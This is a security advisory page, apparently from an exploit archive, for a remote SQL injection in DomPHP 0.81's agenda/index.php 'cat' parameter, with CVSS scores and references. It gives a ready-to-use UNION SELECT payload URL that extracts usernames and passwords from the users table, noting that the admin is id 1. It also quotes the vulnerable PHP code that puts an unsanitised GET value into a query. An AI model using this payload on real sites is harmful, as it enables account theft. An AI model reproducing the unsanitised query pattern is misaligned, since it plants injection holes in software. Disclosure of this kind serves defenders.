DomPHP 0.81 (index.php cat) Remote SQL Injection Vulnerability

2009.02.07
Credit: MhZ91
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

--==+================================================================================+==-- --==+ DomPHP v0.81 Remote Sql Injection +==-- --==+================================================================================+==-- Author: MhZ91 Title: DomPHP v0.81 Remote Sql Injection Download: http://www.domphp.com/download/cat.php?idcat=1 Bug: Remote Sql Injection Info: DomPHP est un outil de publication entiÃrement modulable et surtout complÃtement personnalisable ! Idéal pour les experts mais aussi pour les novices désireux de présenter un site de qualité, vous allez créer votre portail ou site web en quelques clics ! Visit: http://www.inj3ct-it.org [*]---------------------------------------------------------- Exploit: http://[www.example.com]/agenda/index.php?cat=-1+union+select+concat(nomUtilisateur,char(58),passUtilisateur)+from+domphp_utilisateurs+where+id_utilisateur=[UserId]/* For get the user and password, u must edit [UserId] whit an id number of members. The id of admin, is 1 of default. Vuln code in /agenda/index.php [...] if ($_GET['cat']) { $cat = $_GET['cat']; if (!$nomcat) { $requete5="select nomCategorie from ".$extension."sortircat where id_categorie=$cat"; $result5=mysql_query($requete5, $link); $recherchenomcat=mysql_fetch_object($result5); $nomcat = stripslashes($recherchenomcat->nomCategorie); } [...] There is other more sql injection... [*]----------------------------------------------------------

References:

http://www.securityfocus.com/bid/27233
http://www.milw0rm.com/exploits/4888


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top